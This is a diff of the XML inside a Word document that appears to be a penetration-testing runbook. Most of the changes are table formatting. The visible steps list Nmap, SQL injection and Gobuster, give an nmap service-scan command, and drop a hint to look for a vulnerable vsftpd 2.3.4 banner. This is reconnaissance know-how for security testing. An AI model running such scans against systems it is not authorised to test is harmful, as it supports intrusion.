               <w:jc w:val="left"/>
@@ -1292,14 +1289,14 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1319,14 +1316,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1354,13 +1351,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="center"/>
@@ -1371,8 +1368,8 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
               </w:rPr>
             </w:r>
           </w:p>
@@ -1450,14 +1447,7 @@
           <w:sz w:val="56"/>
           <w:szCs w:val="56"/>
         </w:rPr>
-        <w:t xml:space="preserve">Runbook </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="56"/>
-          <w:szCs w:val="56"/>
-        </w:rPr>
-        <w:t>2</w:t>
+        <w:t>Runbook 2</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1476,12 +1466,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1530"/>
+        <w:gridCol w:w="1529"/>
         <w:gridCol w:w="493"/>
-        <w:gridCol w:w="2289"/>
+        <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="1756"/>
-        <w:gridCol w:w="1287"/>
+        <w:gridCol w:w="1286"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -1489,15 +1479,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1517,13 +1507,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2289" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1550,7 +1540,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1570,14 +1560,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3043" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1602,15 +1592,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1630,13 +1620,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2289" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1663,7 +1653,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1683,14 +1673,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3043" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1715,15 +1705,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1743,13 +1733,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2289" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1776,7 +1766,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1796,14 +1786,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3043" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1828,15 +1818,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1856,13 +1846,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2289" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1889,7 +1879,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1909,35 +1899,28 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3043" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Nmap, SQLi, </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Web, Gobuster</w:t>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Nmap, SQLi, Web, Gobuster</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1948,14 +1931,14 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1530" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1529" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -1975,7 +1958,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2002,7 +1985,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2027,15 +2010,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2055,7 +2038,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2063,7 +2046,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2083,14 +2066,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2115,14 +2098,14 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2142,14 +2125,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2169,7 +2152,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2186,36 +2169,16 @@
               <w:t>nmap -sC -sV -oN init.scan $IP</w:t>
             </w:r>
           </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Check outputs for the vsftpd 2.3.4 header</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="center"/>
@@ -2226,8 +2189,8 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
               </w:rPr>
             </w:r>
           </w:p>
@@ -2239,15 +2202,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2267,7 +2230,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2275,7 +2238,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2295,14 +2258,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2327,14 +2290,14 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2354,14 +2317,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2381,7 +2344,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2401,7 +2364,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2430,13 +2393,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="center"/>
@@ -2447,8 +2410,8 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
               </w:rPr>
             </w:r>
           </w:p>
@@ -2460,15 +2423,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2488,7 +2451,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2496,7 +2459,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2516,14 +2479,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2548,14 +2511,14 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2575,14 +2538,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2602,7 +2565,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2629,7 +2592,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2649,7 +2612,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
